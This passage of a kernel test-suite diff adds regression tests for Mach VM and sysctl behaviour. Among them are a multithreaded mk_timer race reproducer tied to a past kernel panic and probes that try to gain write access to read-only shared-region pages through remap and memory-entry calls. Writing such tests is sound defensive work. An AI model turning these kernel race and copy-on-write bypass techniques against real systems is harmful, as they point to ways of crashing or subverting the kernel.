with SIGILL. + * + * atan() was picked as a shared region function that isn't likely used by any normal daemons. + */ +T_DECL(text_corruption_recovery, "test detection/recovery of text corruption", + T_META_IGNORECRASHES(".*text_corruption_helper.*"), + T_META_ASROOT(true)) +{ + int ret; + + ret = my_system("./text_corruption_helper foo"); + T_QUIET; T_ASSERT_EQ(ret, 0, "First call of foo"); + + ret = my_system("./text_corruption_helper Xfoo"); + T_QUIET; T_ASSERT_EQ(ret, SIGILL, "Call of corrupted foo"); + + ret = my_system("./text_corruption_helper foo"); + T_QUIET; T_ASSERT_EQ(ret, 0, "Fixed call of foo"); + + ret = my_system("./text_corruption_helper atan"); + T_QUIET; T_ASSERT_EQ(ret, 0, "First call of atan"); + + ret = my_system("./text_corruption_helper Xatan"); + T_QUIET; T_ASSERT_EQ(ret, SIGILL, "Call of corrupted atan"); + + ret = my_system("./text_corruption_helper atan"); + T_QUIET; T_ASSERT_EQ(ret, 0, "Fixed call of atan"); +} diff --git a/tests/text_corruption_helper.c b/tests/text_corruption_helper.c new file mode 100644 index 000000000..576836a99 --- /dev/null +++ b/tests/text_corruption_helper.c @@ -0,0 +1,56 @@ +#include +#include +#include +#include +#include +#include +#include + +__attribute__((noinline)) +static void +foo(void) +{ + printf("In foo()\n"); + fflush(stdout); +} + +/* + * volatile to stop the compiler from optimizing away calls to atan() + */ +volatile double zero = 0.0; + +int +main(int argc, char **argv) +{ + void *addr; + size_t s = sizeof(addr); + int err; + int a; + + /* + * needs to run as root for sysctl. + */ + if (geteuid() != 0) { + printf("Test not running as root\n"); + exit(-1); + } + + if (strcmp(argv[argc - 1], "foo") == 0) { + foo(); + } else if (strcmp(argv[argc - 1], "Xfoo") == 0) { + printf("Warm up call to foo()\n"); + foo(); + addr = ptrauth_strip(&foo, ptrauth_key_function_pointer); + err = sysctlbyname("vm.corrupt_text_addr", NULL, NULL, &addr, s); + foo(); + } else if (strcmp(argv[argc - 1], "atan") == 0) { + printf("atan(0) is %g\n", atan(zero)); + } else if (strcmp(argv[argc - 1], "Xatan") == 0) { + printf("Warmup call to atan(0) is %g\n", atan(zero)); + addr = ptrauth_strip(&atan, ptrauth_key_function_pointer); + err = sysctlbyname("vm.corrupt_text_addr", NULL, NULL, &addr, s); + printf("atan(0) is %g\n", atan(zero)); + } else { + exit(-1); + } +} diff --git a/tests/thread_call_race_71455282.c b/tests/thread_call_race_71455282.c new file mode 100644 index 000000000..df5d8c8f3 --- /dev/null +++ b/tests/thread_call_race_71455282.c @@ -0,0 +1,52 @@ +#include +#include +#include +#include + +#include +#include +#include +#include + +#define die(w) errx(1, (w)) +#define edie(w) err(1, (w)) +#define expect(e) if (-1 == (e)) edie(#e) + +static void * +racer(void *data) +{ + for (;;) { + mk_timer_destroy(*(mach_port_t *)data); + } + + return NULL; +} + +T_DECL(thread_call_race_71455282, + "rdar://71455282", + T_META_IGNORECRASHES(".*thread_call_race_71455282.*")) +{ + mach_port_t timer = MACH_PORT_NULL; + pthread_t t; + size_t n; + + /* we will violate mach rules so ignore crashes here */ + T_ASSERT_MACH_SUCCESS(task_set_exc_guard_behavior(mach_task_self(), 0), + "task_set_exc_guard_behavior"); + + for (n = 0; n < 4; ++n) { + T_ASSERT_POSIX_SUCCESS(pthread_create(&t, NULL, racer, &timer), + "pthread_create"); + } + + T_LOG("racing"); + for (size_t i = 0; i < 1000; i++) { + timer = mk_timer_create(); + mk_timer_arm(timer, 1); + mk_timer_destroy(timer); + timer = MACH_PORT_NULL; + } + + T_PASS("didn't panic"); + T_END; +} diff --git a/tests/trial_experiments.c b/tests/trial_experiments.c new file mode 100644 index 000000000..fd197cd91 --- /dev/null +++ b/tests/trial_experiments.c @@ -0,0 +1,83 @@ +#include +#include +#include + +#include + +#include "drop_priv.h" +#include "test_utils.h" + +#if ENTITLED +#define SET_TREATMENT_ID set_treatment_id_entitled +#define SET_TREATMENT_ID_DESCR "Can set treatment id with entitlement" +#else /* ENTITLED */ +#define SET_TREATMENT_ID set_treatment_id_unentitled +#define SET_TREATMENT_ID_DESCR "Can't set treatment id without entitlement" +#endif /* ENTITLED */ + +T_DECL(SET_TREATMENT_ID, "Verifies that EXPERIMENT sysctls can only be set with the entitlement", T_META_ASROOT(false)) +{ +#define TEST_STR "testing" +#define IDENTIFIER_LENGTH 36 + + int ret; + errno_t err; + char val[IDENTIFIER_LENGTH + 1] = {0}; + size_t len = sizeof(val); + char new_val[IDENTIFIER_LENGTH + 1] = {0}; + + if (!is_development_kernel()) { + T_SKIP("skipping test on release kernel"); + } + + strlcpy(new_val, TEST_STR, sizeof(new_val)); + drop_priv(); + + ret = sysctlbyname("kern.trial_treatment_id", val, &len, new_val, strlen(new_val)); + err = errno; +#if ENTITLED + len = sizeof(val); + memset(new_val, 0, sizeof(new_val)); + T_ASSERT_POSIX_SUCCESS(ret, "set kern.trial_treatment_id"); + /* Cleanup. Set it back to the empty string. */ + ret = sysctlbyname("kern.trial_treatment_id", val, &len, new_val, 1); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "reset kern.trial_treatment_id"); +#else + T_ASSERT_POSIX_FAILURE(ret, EPERM, "set kern.trial_treatment_id"); +#endif /* ENTITLED */ +} + +#if ENTITLED +/* Check min and max value limits on numeric factors */ +T_DECL(experiment_factor_numeric_limits, + "Can only set factors within the legal range.", + T_META_ASROOT(false)) +{ +#define kMinVal 5 /* The min value allowed for the testing factor. */ +#define kMaxVal 10 /* The max value allowed for the testing factor. */ + errno_t err; + int ret; + unsigned int current_val; + size_t len = sizeof(current_val); + unsigned int new_val; + + drop_priv(); + new_val = kMinVal - 1; + ret = sysctlbyname("kern.testing_experiment_factor", ¤t_val, &len, &new_val, sizeof(new_val)); + err = errno; + T_ASSERT_POSIX_FAILURE(ret, EINVAL, "set kern.testing_experiment_factor below range."); + + new_val = kMaxVal + 1; + ret = sysctlbyname("kern.testing_experiment_factor", ¤t_val, &len, &new_val, sizeof(new_val)); + err = errno; + T_ASSERT_POSIX_FAILURE(ret, EINVAL, "set kern.testing_experiment_factor above range."); + + new_val = kMaxVal; + ret = sysctlbyname("kern.testing_experiment_factor", ¤t_val, &len, &new_val, sizeof(new_val)); + T_ASSERT_POSIX_SUCCESS(ret, "set kern.testing_experiment_factor at top of range."); + + new_val = kMinVal; + ret = sysctlbyname("kern.testing_experiment_factor", ¤t_val, &len, &new_val, sizeof(new_val)); + T_ASSERT_POSIX_SUCCESS(ret, "set kern.testing_experiment_factor at bottom of range."); +} +#endif /* ENTITLED */ diff --git a/tests/trial_experiments.entitlements b/tests/trial_experiments.entitlements new file mode 100644 index 000000000..4d1bd47e0 --- /dev/null +++ b/tests/trial_experiments.entitlements @@ -0,0 +1,8 @@ + + + + + com.apple.private.write-kr-experiment-factors + + + diff --git a/tests/vm/fault_throughput.c b/tests/vm/fault_throughput.c index 3cf9ef1b2..fbfcb3951 100644 --- a/tests/vm/fault_throughput.c +++ b/tests/vm/fault_throughput.c @@ -42,7 +42,7 @@ #include #include -#include "vm/perf_helpers.h" +#include "benchmark/helpers.h" #if (TARGET_OS_OSX || TARGET_OS_SIMULATOR) /* @@ -121,10 +121,6 @@ typedef struct test_args { bool verbose; } test_args_t; -/* Get a (wall-time) timestamp in nanoseconds */ -static uint64_t get_timestamp_ns(void); -/* Get the number of cpus on this device. */ -static unsigned int get_ncpu(void); /* * Fault in the pages in the given buffer. */ @@ -197,7 +193,7 @@ main(int argc, char **argv) #else static const size_t memory_per_core = 25 * (1UL << 20); #endif /* (TARGET_OS_OSX || TARGET_OS_SIMULATOR) */ - const size_t kMemSize = memory_per_core * get_ncpu(); + const size_t kMemSize = memory_per_core * (size_t) get_ncpu(); test_globals_t *globals = allocate_test_globals(); /* Total wall-time spent faulting in pages. */ uint64_t wall_time_elapsed_ns = 0; @@ -368,7 +364,7 @@ start_iteration(test_globals_t* globals, test_variant_t variant, bool verbose) setup_memory(globals, variant); benchmark_log(verbose, "Initialized data structures for iteration. Waking workers.\n"); /* Grab a timestamp, tick the current iteration, and wake up the worker threads */ - start_time = get_timestamp_ns(); + start_time = current_timestamp_ns(); globals->tg_current_iteration++; ret = pthread_mutex_unlock(&globals->tg_lock); assert(ret == 0); @@ -387,7 +383,7 @@ finish_iteration(test_globals_t* globals, uint64_t start_time) while (globals->tg_iterations_completed != globals->tg_current_iteration) { ret = pthread_cond_wait(&globals->tg_cv, &globals->tg_lock); } - end_time = get_timestamp_ns(); + end_time = current_timestamp_ns(); ret = pthread_mutex_unlock(&globals->tg_lock); unmap_fault_buffers(globals); assert(ret == 0); @@ -602,22 +598,6 @@ print_help(char** argv) fprintf(stderr, " %s Share vm objects across faulting threads.\n", kShareObjectsArgument); } -static uint64_t -get_timestamp_ns() -{ - return clock_gettime_nsec_np(kWallTimeClock); -} - -static unsigned int -get_ncpu(void) -{ - int ncpu; - size_t sysctl_size = sizeof(ncpu); - int ret = sysctlbyname("hw.ncpu", &ncpu, &sysctl_size, NULL, 0); - assert(ret == 0); - return (unsigned int) ncpu; -} - static void parse_arguments(int argc, char** argv, test_args_t *args) { diff --git a/tests/vm/page_size_globals.c b/tests/vm/page_size_globals.c new file mode 100644 index 000000000..3e563ce8d --- /dev/null +++ b/tests/vm/page_size_globals.c @@ -0,0 +1,43 @@ +#include +#include + +T_GLOBAL_META( + T_META_NAMESPACE("vm_page_size_overrides") + ); + +static void +verify_page_size( + int expected_shift, + int page_shift, + vm_size_t page_size, + vm_size_t page_mask) +{ + T_ASSERT_EQ(page_shift, expected_shift, "page_shift"); + T_ASSERT_EQ(page_size, 1UL << expected_shift, "page_size"); + T_ASSERT_EQ(page_mask, page_size - 1, "page_mask"); +} + + +T_DECL(kernel_4k, + "Can override vm_kernel_page_size", + T_META_ENVVAR("VM_KERNEL_PAGE_SIZE_4K=1"), + T_META_ENVVAR("MallocGuardEdges=0"), + T_META_ENVVAR("MallocDoNotProtectPrelude=1"), + T_META_ENVVAR("MallocDoNotProtectPostlude=1")) +{ + verify_page_size(12, vm_kernel_page_shift, vm_kernel_page_size, vm_kernel_page_mask); +} + +T_DECL(invalid, + "Invalid overrides", + T_META_ENVVAR("VM_KERNEL_PAGE_SIZE_4K=2"), + T_META_ENVVAR("VM_KERNEL_PAGE_SIZE=4K"), + T_META_ENVVAR("VM_KERNEL_PAGE_SIZE=")) +{ + /* + * This test just verifies that libkernel_init doesn't + * crash when handling invalid overrides. + * So if we got here, we can pass the test. + */ + T_PASS("Test process spawned"); +} diff --git a/tests/vm/perf_helpers.c b/tests/vm/perf_helpers.c deleted file mode 100644 index b4dea3102..000000000 --- a/tests/vm/perf_helpers.c +++ /dev/null @@ -1,69 +0,0 @@ -#include -#include -#include -#include -#include -#include - -#include - -#include "vm/perf_helpers.h" - -#define K_CTIME_BUFFER_LEN 26 -void -benchmark_log(bool verbose, const char *restrict fmt, ...) -{ - time_t now; - char time_buffer[K_CTIME_BUFFER_LEN]; - struct tm local_time; - va_list args; - if (verbose) { - strncpy(time_buffer, "UNKNOWN", K_CTIME_BUFFER_LEN); - - now = time(NULL); - if (now != -1) { - struct tm* ret = localtime_r(&now, &local_time); - if (ret == &local_time) { - snprintf(time_buffer, K_CTIME_BUFFER_LEN, - "%.2d/%.2d/%.2d %.2d:%.2d:%.2d", - local_time.tm_mon + 1, local_time.tm_mday, - local_time.tm_year + 1900, - local_time.tm_hour, local_time.tm_min, - local_time.tm_sec); - } - } - - printf("%s: ", time_buffer); - va_start(args, fmt); - vprintf(fmt, args); - fflush(stdout); - } -} - -uint64_t -timespec_difference_us(const struct timespec* a, const struct timespec* b) -{ - assert(a->tv_sec >= b->tv_sec || a->tv_nsec >= b->tv_nsec); - long seconds_elapsed = a->tv_sec - b->tv_sec; - uint64_t nsec_elapsed; - if (b->tv_nsec > a->tv_nsec) { - seconds_elapsed--; - nsec_elapsed = kNumNanosecondsInSecond - (uint64_t) (b->tv_nsec - a->tv_nsec); - } else { - nsec_elapsed = (uint64_t) (a->tv_nsec - b->tv_nsec); - } - return (uint64_t) seconds_elapsed * kNumMicrosecondsInSecond + nsec_elapsed / kNumNanosecondsInMicrosecond; -} - -unsigned char * -mmap_buffer(size_t memsize) -{ - int fd = -1; - unsigned char* addr = (unsigned char *)mmap(NULL, memsize, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, - fd, 0); - if ((void*) addr == MAP_FAILED) { - fprintf(stderr, "Unable to mmap a memory object: %s\n", strerror(errno)); - exit(2); - } - return addr; -} diff --git a/tests/vm/perf_helpers.h b/tests/vm/perf_helpers.h deleted file mode 100644 index 53633f542..000000000 --- a/tests/vm/perf_helpers.h +++ /dev/null @@ -1,34 +0,0 @@ -#ifndef VM_PERF_HELPERS_H -#define VM_PERF_HELPERS_H - -/* - * Utility functions and constants used by the VM perf tests. - */ -#include -#include -#include - -/* - * mmap an anonymous chunk of memory. - */ -unsigned char *mmap_buffer(size_t size); -/* - * Returns a - b in microseconds. - * NB: a must be >= b - */ -uint64_t timespec_difference_us(const struct timespec* a, const struct timespec* b); -/* - * Print the message to stdout along with the current time. - * Also flushes stdout so that the log can help detect hangs. Don't call - * this function from within the measured portion of the benchmark as it will - * pollute your measurement. - * - * NB: Will only log if verbose == true. - */ -void benchmark_log(bool verbose, const char *restrict fmt, ...) __attribute__((format(printf, 2, 3))); - -static const uint64_t kNumMicrosecondsInSecond = 1000UL * 1000; -static const uint64_t kNumNanosecondsInMicrosecond = 1000UL; -static const uint64_t kNumNanosecondsInSecond = kNumNanosecondsInMicrosecond * kNumMicrosecondsInSecond; - -#endif /* !defined(VM_PERF_HELPERS_H) */ diff --git a/tests/vm/perf_madvise.c b/tests/vm/perf_madvise.c index b579361b3..c8fd45487 100644 --- a/tests/vm/perf_madvise.c +++ b/tests/vm/perf_madvise.c @@ -12,7 +12,7 @@ #include #include -#include "vm/perf_helpers.h" +#include "benchmark/helpers.h" typedef enum test_variant { VARIANT_MADVISE_FREE diff --git a/tests/vm/retired_pages.c b/tests/vm/retired_pages.c new file mode 100644 index 000000000..95a5706cb --- /dev/null +++ b/tests/vm/retired_pages.c @@ -0,0 +1,46 @@ +#include +#include + +#include + +/* + * trying phys offsets from start of dram of: + * watchOS 512Meg + * macOS 3Gig + * iOS,etc. 750Meg + */ +#if TARGET_OS_WATCH +#define USEBOOTARG "bad_ram_pages=536870912 bad_static_mfree=1" +#elif TARGET_OS_OSX +#define USEBOOTARG "bad_ram_pages=3221225472 bad_static_mfree=1" +#else +#define USEBOOTARG "bad_ram_pages=786432000 bad_static_mfree=1" +#endif + +T_DECL(retired_pages_test, + "Test retiring pages at boot", + T_META_NAMESPACE("xnu.vm"), + T_META_BOOTARGS_SET(USEBOOTARG), + T_META_ASROOT(true), + T_META_CHECK_LEAKS(false)) +{ + int err; + unsigned int count = 0; + size_t s = sizeof(count); + +#if !defined(__arm64__) || TARGET_OS_BRIDGE + T_SKIP("No page retirement on x86, arm32 or bridgeOS kernels"); +#endif + /* + * Get the number of pages retired from the kernel + */ + err = sysctlbyname("vm.retired_pages_count", &count, &s, NULL, 0); + + /* If the sysctl isn't supported, test succeeds */ + if (err == ENOENT) { + T_SKIP("sysctl vm.retired_pages_count not found, skipping test"); + } + T_ASSERT_POSIX_SUCCESS(err, "sysctl vm.retired_pages_count"); + + T_ASSERT_GT_INT(count, 0, "Expect retired pages"); +} diff --git a/tests/vm_test_code_signing_helper.c b/tests/vm_test_code_signing_helper.c index 0c429d725..7c799c775 100644 --- a/tests/vm_test_code_signing_helper.c +++ b/tests/vm_test_code_signing_helper.c @@ -1,3 +1,4 @@ +#include #include #include #include @@ -140,13 +141,13 @@ main( fprintf(stdout, "%s: WARNING: unsigned code was executed\n", cmdname); -#if CONFIG_EMBEDDED +#if !TARGET_OS_OSX /* fail: unsigned code was executed */ fprintf(stdout, "%s: FAIL\n", cmdname); exit(1); -#else /* CONFIG_EMBEDDED */ +#else /* !TARGET_OS_OSX */ /* no fail: unsigned code is only prohibited on embedded platforms */ fprintf(stdout, "%s: SUCCESS\n", cmdname); exit(0); -#endif /* CONFIG_EMBEDDED */ +#endif /* !TARGET_OS_OSX */ } diff --git a/tests/vm_test_mach_map.c b/tests/vm_test_mach_map.c index 2ab86744f..6fd927b77 100644 --- a/tests/vm_test_mach_map.c +++ b/tests/vm_test_mach_map.c @@ -7,6 +7,7 @@ */ #include +#include #include #include #include @@ -623,7 +624,7 @@ T_DECL(madvise_shared, "test madvise shared for rdar://problem/2295713 logging \ } #if defined(__x86_64__) || defined(__i386__) - if (*((uint64_t *)_COMM_PAGE_CPU_CAPABILITIES64) & kIsTranslated) { + if (COMM_PAGE_READ(uint64_t, CPU_CAPABILITIES64) & kIsTranslated) { T_LOG("Skipping madvise reusable tests because we're running under translation."); goto done; } @@ -672,7 +673,7 @@ T_DECL(madvise_purgeable_can_reuse, "test madvise purgeable can reuse for \ T_META_ALL_VALID_ARCHS(true)) { #if defined(__x86_64__) || defined(__i386__) - if (*((uint64_t *)_COMM_PAGE_CPU_CAPABILITIES64) & kIsTranslated) { + if (COMM_PAGE_READ(uint64_t, CPU_CAPABILITIES64) & kIsTranslated) { T_SKIP("madvise reusable is not supported under Rosetta translation. Skipping.)"); } #endif /* defined(__x86_64__) || defined(__i386__) */ @@ -951,6 +952,677 @@ T_DECL(nested_pmap_trigger, "nested pmap should only be triggered from kernel \ T_ASSERT_MACH_SUCCESS(kr, "vm_map()"); } +static const char *prot_str[] = { "---", "r--", "-w-", "rw-", "--x", "r-x", "-wx", "rwx" }; +static const char *share_mode_str[] = { "---", "COW", "PRIVATE", "EMPTY", "SHARED", "TRUESHARED", "PRIVATE_ALIASED", "SHARED_ALIASED", "LARGE_PAGE" }; + +T_DECL(shared_region_share_writable, "sharing a writable mapping of the shared region shoudl not give write access to shared region - rdar://problem/74469953", + T_META_ALL_VALID_ARCHS(true)) +{ + int ret; + uint64_t sr_start; + kern_return_t kr; + mach_vm_address_t address, tmp_address, remap_address; + mach_vm_size_t size, tmp_size, remap_size; + uint32_t depth; + mach_msg_type_number_t count; + vm_region_submap_info_data_64_t info; + vm_prot_t cur_prot, max_prot; + uint32_t before, after, remap; + mach_port_t mem_entry; + + ret = __shared_region_check_np(&sr_start); + if (ret != 0) { + int saved_errno; + saved_errno = errno; + + T_ASSERT_EQ(saved_errno, ENOMEM, "__shared_region_check_np() %d (%s)", + saved_errno, strerror(saved_errno)); + T_END; + } + T_LOG("SHARED_REGION_BASE 0x%llx", SHARED_REGION_BASE); + T_LOG("SHARED_REGION_SIZE 0x%llx", SHARED_REGION_SIZE); + T_LOG("shared region starts at 0x%llx", sr_start); + T_QUIET; T_ASSERT_GE(sr_start, SHARED_REGION_BASE, + "shared region starts below BASE"); + T_QUIET; T_ASSERT_LT(sr_start, SHARED_REGION_BASE + SHARED_REGION_SIZE, + "shared region starts above BASE+SIZE"); + + /* + * Step 1 - check that one can not get write access to a read-only + * mapping in the shared region. + */ + size = 0; + for (address = SHARED_REGION_BASE; + address < SHARED_REGION_BASE + SHARED_REGION_SIZE; + address += size) { + size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &address, + &size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_region_recurse()"); + if (kr == KERN_INVALID_ADDRESS) { + T_SKIP("could not find read-only nested mapping"); + T_END; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + address, address + size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + if (depth > 0 && + (info.protection == VM_PROT_READ) && + (info.max_protection == VM_PROT_READ)) { + /* nested and read-only: bingo! */ + break; + } + } + if (address >= SHARED_REGION_BASE + SHARED_REGION_SIZE) { + T_SKIP("could not find read-only nested mapping"); + T_END; + } + + /* test vm_remap() of RO */ + before = *(uint32_t *)(uintptr_t)address; + remap_address = 0; + remap_size = size; + kr = mach_vm_remap(mach_task_self(), + &remap_address, + remap_size, + 0, + VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, + mach_task_self(), + address, + FALSE, + &cur_prot, + &max_prot, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap()"); +// T_QUIET; T_ASSERT_EQ(cur_prot, VM_PROT_READ, "cur_prot is read-only"); +// T_QUIET; T_ASSERT_EQ(max_prot, VM_PROT_READ, "max_prot is read-only"); + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only"); +// T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only"); + /* check that new mapping is read-only */ + tmp_address = remap_address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, remap_address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "new cur_prot read-only"); +// T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "new max_prot read-only"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); +// this would crash if actually read-only: +// *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("vm_remap(): 0x%llx 0x%x -> 0x%x", address, before, after); +// *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("vm_remap() bypassed copy-on-write"); + } else { + T_PASS("vm_remap() did not bypass copy-on-write"); + } + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + T_PASS("vm_remap() read-only"); + +#if defined(VM_MEMORY_ROSETTA) + if (dlsym(RTLD_DEFAULT, "mach_vm_remap_new") == NULL) { + T_PASS("vm_remap_new() is not present"); + goto skip_vm_remap_new_ro; + } + /* test vm_remap_new() of RO */ + before = *(uint32_t *)(uintptr_t)address; + remap_address = 0; + remap_size = size; + cur_prot = VM_PROT_READ | VM_PROT_WRITE; + max_prot = VM_PROT_READ | VM_PROT_WRITE; + kr = mach_vm_remap_new(mach_task_self(), + &remap_address, + remap_size, + 0, + VM_FLAGS_ANYWHERE, + mach_task_self(), + address, + FALSE, + &cur_prot, + &max_prot, + VM_INHERIT_DEFAULT); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_remap_new()"); + if (kr == KERN_PROTECTION_FAILURE) { + /* wrong but not a security issue... */ + goto skip_vm_remap_new_ro; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap_new()"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("vm_remap_new(): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("vm_remap_new() bypassed copy-on-write"); + } else { + T_PASS("vm_remap_new() did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only"); + T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only"); + T_PASS("vm_remap_new() read-only"); +skip_vm_remap_new_ro: +#else /* defined(VM_MEMORY_ROSETTA) */ + /* pre-BigSur SDK: no vm_remap_new() */ + T_LOG("No vm_remap_new() to test"); +#endif /* defined(VM_MEMORY_ROSETTA) */ + + /* test mach_make_memory_entry_64(VM_SHARE) of RO */ + before = *(uint32_t *)(uintptr_t)address; + remap_size = size; + mem_entry = MACH_PORT_NULL; + kr = mach_make_memory_entry_64(mach_task_self(), + &remap_size, + address, + MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE, + &mem_entry, + MACH_PORT_NULL); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)"); + if (kr == KERN_PROTECTION_FAILURE) { + /* wrong but not a security issue... */ + goto skip_mem_entry_vm_share_ro; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)"); + remap_address = 0; + kr = mach_vm_map(mach_task_self(), + &remap_address, + remap_size, + 0, /* mask */ + VM_FLAGS_ANYWHERE, + mem_entry, + 0, /* offset */ + FALSE, /* copy */ + VM_PROT_READ | VM_PROT_WRITE, + VM_PROT_READ | VM_PROT_WRITE, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("mem_entry(VM_SHARE): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("mem_entry(VM_SHARE) bypassed copy-on-write"); + } else { + T_PASS("mem_entry(VM_SHARE) did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only"); + T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only"); + /* check that new mapping is a copy */ + tmp_address = remap_address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, remap_address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_EQ(depth, 0, "new mapping is unnested"); +// T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "new cur_prot read-only"); +// T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "new max_prot read-only"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + T_PASS("mem_entry(VM_SHARE) read-only"); +skip_mem_entry_vm_share_ro: + + /* test mach_make_memory_entry_64() of RO */ + before = *(uint32_t *)(uintptr_t)address; + remap_size = size; + mem_entry = MACH_PORT_NULL; + kr = 